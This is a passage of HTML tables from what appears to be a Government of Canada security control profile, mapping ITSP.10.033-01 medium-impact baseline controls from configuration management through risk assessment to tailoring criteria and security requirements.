exception 03.04.08</a></td> </tr><tr><td>CM-08</td> <td>System component inventory</td> <td>C</td> <td><a href="#03-04-10">System component inventory 03.04.10</a></td> </tr><tr><td>CM-08(01)</td> <td>System component inventory: Updates during installation and removal</td> <td>C</td> <td><a href="#03-04-10">System component inventory 03.04.10</a></td> </tr><tr><td>CM-08(03)</td> <td>System component inventory: Automated unauthorized component detection</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-08(04)</td> <td>System component inventory: Accountability information</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-08(06)</td> <td>System component inventory: Assessed configurations and approved deviations</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-09</td> <td>Configuration management plan</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-10</td> <td>Software usage restrictions</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-11</td> <td>User-installed software</td> <td>ORC</td> <td>none</td> </tr><tr><td>CM-11(02)</td> <td>User-installed software: Software installation with privileged status</td> <td>ORC</td> <td>none</td> </tr><tr><td>CM-12</td> <td>Information location</td> <td>C</td> <td><a href="#03-04-11">Information location 03.04.11</a></td> </tr><tr><td>CM-12(01)</td> <td>Information location: Automated tools to support information location</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab6"><caption>Table 6: Contingency planning (CP)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact 
baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>CP-01</td> <td>Contingency planning policy and procedures</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02</td> <td>Contingency plan</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02(01)</td> <td>Contingency plan: Coordinate with related plans</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02(02)</td> <td>Contingency plan: Capacity planning</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02(03)</td> <td>Contingency plan: Resume mission and business functions</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02(08)</td> <td>Contingency plan: Identify critical assets</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-03</td> <td>Contingency training</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-04</td> <td>Contingency plan testing</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-04(01)</td> <td>Contingency plan testing: Coordinate related plans</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-06</td> <td>Alternate storage site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-06(01)</td> <td>Alternate storage site: Separation of primary site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-06(03)</td> <td>Alternate storage site: Accessibility</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07</td> <td>Alternate processing site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(01)</td> <td>Alternate processing site: Separation of primary site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(02)</td> <td>Alternate processing site: Accessibility</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(03)</td> <td>Alternate processing site: Priority of service</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(04)</td> <td>Alternate processing site: Preparation for use</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(06)</td> <td>Alternate processing site: Inability to return to primary site</td> <td>NCO</td> 
<td>none</td> </tr><tr><td>CP-08</td> <td>Telecommunications services</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-08(01)</td> <td>Telecommunications services: Priority of service provisions</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-08(02)</td> <td>Telecommunications services: Single points of failure</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-08(03)</td> <td>Telecommunications services: Separation of primary and alternate providers</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-08(05)</td> <td>Telecommunications services: Alternate telecommunication service testing</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09</td> <td>System backup</td> <td>C</td> <td><a href="#03-08-09">System backup – cryptographic protection 03.08.09</a></td> </tr><tr><td>CP-09(01)</td> <td>System backup: Testing for reliability and integrity</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09(03)</td> <td>System backup: Separate storage for critical information</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09(05)</td> <td>System backup: Transfer to alternate storage site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09(07)</td> <td>System backup: Dual authorization for deletion or destruction</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09(08)</td> <td>System backup: Cryptographic protection</td> <td>C</td> <td><a href="#03-08-09">System backup – cryptographic protection 03.08.09</a></td> </tr><tr><td>CP-10</td> <td>System recovery and reconstitution</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-10(02)</td> <td>System recovery and reconstitution: Transaction recovery</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-10(04)</td> <td>System recovery and reconstitution: Restore within time period</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-10(06)</td> <td>System recovery and reconstitution: Component protection</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div>
<div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab7"><caption>Table 7: Identification and authentication (IA)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>IA-01</td> <td>Identification and authentication policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>IA-02</td> <td>Identification and authentication (organizational users)</td> <td>C</td> <td><a href="#03-05-01">User identification, authentication, and re-authentication 03.05.01</a></td> </tr><tr><td>IA-02(01)</td> <td>Identification and authentication (organizational users): Multi-factor authentication to privileged accounts</td> <td>C</td> <td><a href="#03-05-03">Multi-factor authentication 03.05.03</a></td> </tr><tr><td>IA-02(02)</td> <td>Identification and authentication (organizational users): Multi-factor authentication to non-privileged accounts</td> <td>C</td> <td><a href="#03-05-03">Multi-factor authentication 03.05.03</a></td> </tr><tr><td>IA-02(08)</td> <td>Identification and authentication (organizational users): Access to accounts – replay resistant</td> <td>C</td> <td><a href="#03-05-04">Replay-resistant authentication 03.05.04</a></td> </tr><tr><td>IA-02(10)</td> <td>Identification and authentication (organizational users): Single sign-on</td> <td>NCO</td> <td>none</td> </tr><tr><td>IA-02(12)</td> <td>Identification and authentication (organizational users): Use of hardware token <abbr title="Government of Canada">GC</abbr>-issued <abbr title="Public
Key Infrastructure">PKI</abbr>-based credentials</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-03</td> <td>Device identification and authentication</td> <td>C</td> <td><a href="#03-05-02">Device identification and authentication 03.05.02</a></td> </tr><tr><td>IA-04</td> <td>Identifier management</td> <td>C</td> <td><a href="#03-05-05">Identifier management 03.05.05</a></td> </tr><tr><td>IA-04(04)</td> <td>Identifier management: Identify user status</td> <td>C</td> <td><a href="#03-05-05">Identifier management 03.05.05</a></td> </tr><tr><td>IA-05</td> <td>Authenticator management</td> <td>C</td> <td><a href="#03-05-12">Authenticator management 03.05.12</a></td> </tr><tr><td>IA-05(01)</td> <td>Authenticator management: Password-based authentication</td> <td>C</td> <td><a href="#03-05-07">Password management 03.05.07</a></td> </tr><tr><td>IA-05(02)</td> <td>Authenticator management: Public key-based authentication</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-05(06)</td> <td>Authenticator management: Protection of authenticators</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-05(07)</td> <td>Authenticator management: No embedded unencrypted static authenticators</td> <td>NCO</td> <td>none</td> </tr><tr><td>IA-05(08)</td> <td>Authenticator management: Multiple system accounts</td> <td>NCO</td> <td>none</td> </tr><tr><td>IA-05(09)</td> <td>Authenticator management: Federated credential management</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-05(13)</td> <td>Authenticator management: Expiration of cached authenticators</td> <td>ORC</td> <td>none</td> </tr><tr><td>IA-05(14)</td> <td>Authenticator management: Managing content of <abbr title="Public Key Infrastructure">PKI</abbr> trust stores</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-06</td> <td>Authentication feedback</td> <td>C</td> <td><a href="#03-05-11">Authentication feedback 03.05.11</a></td> </tr><tr><td>IA-07</td> <td>Cryptographic module authentication</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-08</td> 
<td>Identification and authentication (non-organizational users)</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-08(01)</td> <td>Identification and authentication (non-organizational users): Acceptance of <abbr title="Public Key Infrastructure">PKI</abbr>-based credentials from other agencies</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-08(02)</td> <td>Identification and authentication (non-organizational users): Acceptance of external authenticators</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-08(04)</td> <td>Identification and authentication (non-organizational users): Use of defined profiles</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-11</td> <td>Re-authentication</td> <td>C</td> <td><a href="#03-05-01">User identification, authentication, and re-authentication 03.05.01</a></td> </tr><tr><td>IA-12</td> <td>Identity proofing</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-12(02)</td> <td>Identity proofing: Identity evidence</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-12(03)</td> <td>Identity proofing: Identity evidence validation and verification</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-12(04)</td> <td>Identity proofing: In-person validation and verification</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-12(05)</td> <td>Identity proofing: Address confirmation</td> <td>GC</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab8"><caption>Table 8: Incident response (IR)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th
class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>IR-01</td> <td>Incident response policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>IR-02</td> <td>Incident response training</td> <td>C</td> <td><a href="#03-06-04">Incident response training 03.06.04</a></td> </tr><tr><td>IR-03</td> <td>Incident response testing</td> <td>C</td> <td><a href="#03-06-03">Incident response testing 03.06.03</a></td> </tr><tr><td>IR-03(02)</td> <td>Incident response testing: Coordinate with related plans</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-04</td> <td>Incident handling</td> <td>C</td> <td><a href="#03-06-01">Incident handling 03.06.01</a></td> </tr><tr><td>IR-04(03)</td> <td>Incident handling: Continuity of operations</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-04(08)</td> <td>Incident handling: Correlation with external organizations</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-04(09)</td> <td>Incident handling: Dynamic response capability</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-05</td> <td>Incident monitoring</td> <td>C</td> <td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 03.06.02</a></td> </tr><tr><td>IR-06</td> <td>Incident reporting</td> <td>C</td> <td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 03.06.02</a></td> </tr><tr><td>IR-06(01)</td> <td>Incident reporting: Automated reporting</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-06(02)</td> <td>Incident reporting: Vulnerabilities related to incidents</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-06(03)</td> <td>Incident reporting: Supply chain coordination</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-07</td> <td>Incident response assistance</td> <td>C</td> <td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 03.06.02</a></td> </tr><tr><td>IR-07(01)</td> <td>Incident response assistance: Automation support for 
availability of information and support</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-08</td> <td>Incident response plan</td> <td>C</td> <td><a href="#03-06-05">Incident response plan 03.06.05</a></td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab9"><caption>Table 9: Maintenance (MA)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>MA-01</td> <td>System maintenance policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>MA-02</td> <td>Controlled maintenance</td> <td>NCO</td> <td>none</td> </tr><tr><td>MA-03</td> <td>Maintenance tools</td> <td>C</td> <td><a href="#03-07-04">Maintenance tools 03.07.04</a></td> </tr><tr><td>MA-03(01)</td> <td>Maintenance tools: Inspect tools</td> <td>C</td> <td><a href="#03-07-04">Maintenance tools 03.07.04</a></td> </tr><tr><td>MA-03(02)</td> <td>Maintenance tools: Inspect media</td> <td>C</td> <td><a href="#03-07-04">Maintenance tools 03.07.04</a></td> </tr><tr><td>MA-03(03)</td> <td>Maintenance tools: Prevent unauthorized removal</td> <td>C</td> <td><a href="#03-07-04">Maintenance tools 03.07.04</a></td> </tr><tr><td>MA-04</td> <td>Non-local maintenance</td> <td>C</td> <td><a href="#03-07-05">Non-local maintenance 03.07.05</a></td> </tr><tr><td>MA-04(01)</td> <td>Non-local maintenance: Logging and review</td> <td>NCO</td> <td>none</td> </tr><tr><td>MA-04(03)</td>
<td>Non-local maintenance: Comparable security and sanitization</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-04(04)</td> <td>Non-local maintenance: Authentication and separation of maintenance sessions</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-04(05)</td> <td>Non-local maintenance: Approvals and notifications</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-04(06)</td> <td>Non-local maintenance: Cryptographic protection</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-05</td> <td>Maintenance personnel</td> <td>C</td> <td><a href="#03-07-06">Maintenance personnel 03.07.06</a></td> </tr><tr><td>MA-05(01)</td> <td>Maintenance personnel: Individuals without appropriate access</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-06</td> <td>Timely maintenance</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab10"><caption>Table 10: Media protection (MP)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>MP-01</td> <td>Media protection policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>MP-02</td> <td>Media access</td> <td>C</td> <td><a href="#03-08-02">Media access 03.08.02</a></td> </tr><tr><td>MP-03</td> <td>Media marking</td> <td>C</td> <td><a href="#03-08-04">Media marking 03.08.04</a></td> </tr><tr><td>MP-04</td> <td>Media storage</td> <td>C</td> <td><a
href="#03-08-01">Media storage 03.08.01</a></td> </tr><tr><td>MP-05</td> <td>Media transport</td> <td>C</td> <td><a href="#03-08-05">Media transport 03.08.05</a></td> </tr><tr><td>MP-06</td> <td>Media sanitization</td> <td>C</td> <td><a href="#03-08-03">Media sanitization 03.08.03</a></td> </tr><tr><td>MP-06(03)</td> <td>Media sanitization: Non-destructive techniques</td> <td>ORC</td> <td>none</td> </tr><tr><td>MP-06(08)</td> <td>Media sanitization: Remote purging or wiping of information</td> <td>ORC</td> <td>none</td> </tr><tr><td>MP-07</td> <td>Media use</td> <td>C</td> <td><a href="#03-08-07">Media use 03.08.07</a></td> </tr><tr><td>MP-08</td> <td>Media downgrading</td> <td>ORC</td> <td>none</td> </tr><tr><td>MP-08(03)</td> <td>Media downgrading: Protected information</td> <td>ORC</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab11"><caption>Table 11: Physical and environmental protection (PE)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PE-01</td> <td>Physical and environmental protection policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>PE-02</td> <td>Physical access authorizations</td> <td>C</td> <td><a href="#03-10-01">Physical access authorizations 03.10.01</a></td> </tr><tr><td>PE-02(400)</td> <td>Physical access authorizations: Identification cards requirements</td>
<td>GC</td> <td>none</td> </tr><tr><td>PE-03</td> <td>Physical access control</td> <td>C</td> <td><a href="#03-10-07">Physical access control 03.10.07</a></td> </tr><tr><td>PE-03(400)</td> <td>Physical access control: Security inspections</td> <td>GC</td> <td>none</td> </tr><tr><td>PE-04</td> <td>Access control for transmission</td> <td>C</td> <td><a href="#03-10-08">Access control for transmission 03.10.08</a></td> </tr><tr><td>PE-05</td> <td>Access control for output devices</td> <td>C</td> <td><a href="#03-10-07">Physical access control 03.10.07</a></td> </tr><tr><td>PE-06</td> <td>Monitoring physical access</td> <td>C</td> <td><a href="#03-10-02">Monitoring physical access 03.10.02</a></td> </tr><tr><td>PE-06(01)</td> <td>Monitoring physical access: Intrusion alarms and surveillance equipment</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-08</td> <td>Visitor access records</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-09</td> <td>Power equipment and cabling</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-10</td> <td>Emergency shutoff</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-11</td> <td>Emergency power</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-12</td> <td>Emergency lighting</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-13</td> <td>Fire protection</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-13(01)</td> <td>Fire protection: Detection systems – automatic activation and notification</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-13(04)</td> <td>Fire protection: Inspections</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-13(400)</td> <td>Fire protection: Emergency services</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-14</td> <td>Environmental controls</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-15</td> <td>Water damage protection</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-16</td> <td>Delivery and removal</td> <td>NCO</td> <td>none</td> </tr><tr><td>PE-17</td> <td>Alternate work site</td> <td>C</td> <td><a href="#03-10-06">Alternate 
work site 03.10.06</a></td> </tr><tr><td>PE-400</td> <td>Remote and telework environments</td> <td>GC</td> <td>none</td> </tr><tr><td>PE-400(01)</td> <td>Remote and telework environments: Physical information and assets storage</td> <td>GC</td> <td>none</td> </tr><tr><td>PE-400(02)</td> <td>Remote and telework environments: International remote/telework</td> <td>GC</td> <td>none</td> </tr><tr><td>PE-401</td> <td>Security operations centre</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab12"><caption>Table 12: Planning (PL)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PL-01</td> <td>Planning policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>PL-02</td> <td>System security and privacy plans</td> <td>C</td> <td><a href="#03-15-02">System security plan 03.15.02</a></td> </tr><tr><td>PL-04</td> <td>Rules of behaviour</td> <td>C</td> <td><a href="#03-15-03">Rules of behaviour 03.15.03</a></td> </tr><tr><td>PL-04(01)</td> <td>Rules of behaviour: Social media and external site/application usage restrictions</td> <td>NCO</td> <td>none</td> </tr><tr><td>PL-08</td> <td>Security and privacy architectures</td> <td>NCO</td> <td>none</td> </tr><tr><td>PL-10</td> <td>Baseline selection</td> <td>GC</td> <td>none</td> </tr><tr><td>PL-11</td> <td>Baseline tailoring</td> <td>GC</td>
<td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab13"><caption>Table 13: Program management (PM)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PM-01</td> <td>Information security program plan</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-02</td> <td>Information security program leadership role</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-03</td> <td>Information security and privacy resources</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-04</td> <td>Plan of action and milestones process</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-05</td> <td>System and program inventory</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-05(01)</td> <td>System inventory: Inventory of personal information</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-06</td> <td>Measures of performance</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-07</td> <td>Enterprise architecture</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-07(01)</td> <td>Enterprise architecture: Offloading</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-08</td> <td>Critical infrastructure plan</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-09</td> <td>Risk management strategy</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-10</td> <td>Authorization process</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-11</td> <td>Mission and business process definition</td> <td>N/A</td> <td>none</td>
</tr><tr><td>PM-12</td> <td>Insider threat program</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-13</td> <td>Security and privacy workforce</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-14</td> <td>Testing, training, and monitoring</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-15</td> <td>Security and privacy groups and associations</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-16</td> <td>Threat awareness program</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-16(01)</td> <td>Threat awareness program: Automated means for sharing threat intelligence</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-17</td> <td>Protecting specified information on outsourced external systems</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-18</td> <td>Privacy program plan</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-19</td> <td>Privacy program leadership role</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-20</td> <td>Communication of key privacy services</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-20(01)</td> <td>Communication of key privacy services: Privacy policies on websites, applications, and digital services</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-21</td> <td>Maintain a record of disclosures</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-22</td> <td>Personal information quality management</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-23</td> <td>Data governance committee</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-24</td> <td>Data integrity board</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-25</td> <td>Minimization of personal information used in testing, training, and research</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-26</td> <td>Complaint management</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-27</td> <td>Privacy reporting</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-28</td> <td>Risk framing</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-29</td> <td>Risk management program leadership roles</td> <td>N/A</td> <td>none</td> 
</tr><tr><td>PM-30</td> <td>Supply chain risk management strategy</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-30(01)</td> <td>Supply chain risk management strategy: Suppliers of critical or mission-essential items</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-31</td> <td>Continuous monitoring strategy</td> <td>N/A</td> <td>none</td> </tr><tr><td>PM-32</td> <td>Purposing</td> <td>N/A</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab14"><caption>Table 14: Personnel security (PS)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PS-01</td> <td>Personnel security policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>PS-02</td> <td>Position security analysis</td> <td>GC</td> <td>none</td> </tr><tr><td>PS-03</td> <td>Personnel screening</td> <td>C</td> <td><a href="#03-09-01">Personnel screening 03.09.01</a></td> </tr><tr><td>PS-04</td> <td>Personnel termination</td> <td>C</td> <td><a href="#03-09-02">Personnel termination and transfer 03.09.02</a></td> </tr><tr><td>PS-05</td> <td>Personnel transfer</td> <td>C</td> <td><a href="#03-09-02">Personnel termination and transfer 03.09.02</a></td> </tr><tr><td>PS-06</td> <td>Access agreements</td> <td>NCO</td> <td>none</td> </tr><tr><td>PS-07</td> <td>External personnel security</td> <td>NCO</td> <td>none</td> </tr><tr><td>PS-08</td>
<td>Personnel sanctions</td> <td>NCO</td> <td>none</td> </tr><tr><td>PS-09</td> <td>Position descriptions</td> <td>GC</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab15"><caption>Table 15: Personal information handling and transparency (PT)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>PT-01</td> <td>Personal information handling and transparency policy and procedures</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-02</td> <td>Authority to collect and use personal information</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-02(01)</td> <td>Authority to collect and use personal information: Data tagging</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-02(02)</td> <td>Authority to collect and use personal information: Automation</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-03</td> <td>Personal information handling uses and disclosures</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-03(01)</td> <td>Personal information handling uses and disclosures: Data tagging</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-03(02)</td> <td>Personal information handling uses and disclosures: Automation</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04</td> <td>Consent</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04(01)</td> <td>Consent: Tailored consent Government of Canada</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04(02)</td> <td>Consent: Timely
consent</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04(03)</td> <td>Consent: Revocation</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-04(400)</td> <td>Consent: Tailored consent private sector</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-05</td> <td>Privacy notice</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-05(01)</td> <td>Privacy notice: Timely privacy notice statements</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-05(02)</td> <td>Privacy notice: Privacy notice statements</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-06</td> <td>Personal information banks</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-06(01)</td> <td>Personal information banks: Consistent uses and disclosures</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-06(02)</td> <td>Personal information banks: Exempt banks</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-07</td> <td>Particularly sensitive personal information</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-07(01)</td> <td>Particularly sensitive personal information: Social insurance numbers</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-07(02)</td> <td>Particularly sensitive personal information: <em>Canadian Charter of Rights and Freedoms</em></td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-07(400)</td> <td>Particularly sensitive personal information: Private sector</td> <td>N/A</td> <td>none</td> </tr><tr><td>PT-08</td> <td>Data matching requirements</td> <td>N/A</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab16"><caption>Table 16: Risk assessment (RA)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center"
scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>RA-01</td> <td>Risk assessment policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>RA-02</td> <td>Security categorization</td> <td>GC</td> <td>none</td> </tr><tr><td>RA-03</td> <td>Risk assessment</td> <td>C</td> <td><a href="#03-11-01">Risk assessment 03.11.01</a></td> </tr><tr><td>RA-03(01)</td> <td>Risk assessment: Supply chain risk assessment</td> <td>C</td> <td><a href="#03-11-01">Risk assessment 03.11.01</a></td> </tr><tr><td>RA-05</td> <td>Vulnerability monitoring and scanning</td> <td>C</td> <td><a href="#03-11-02">Vulnerability monitoring and scanning 03.11.02</a></td> </tr><tr><td>RA-05(02)</td> <td>Vulnerability monitoring and scanning: Update vulnerabilities to be scanned</td> <td>C</td> <td><a href="#03-11-02">Vulnerability monitoring and scanning 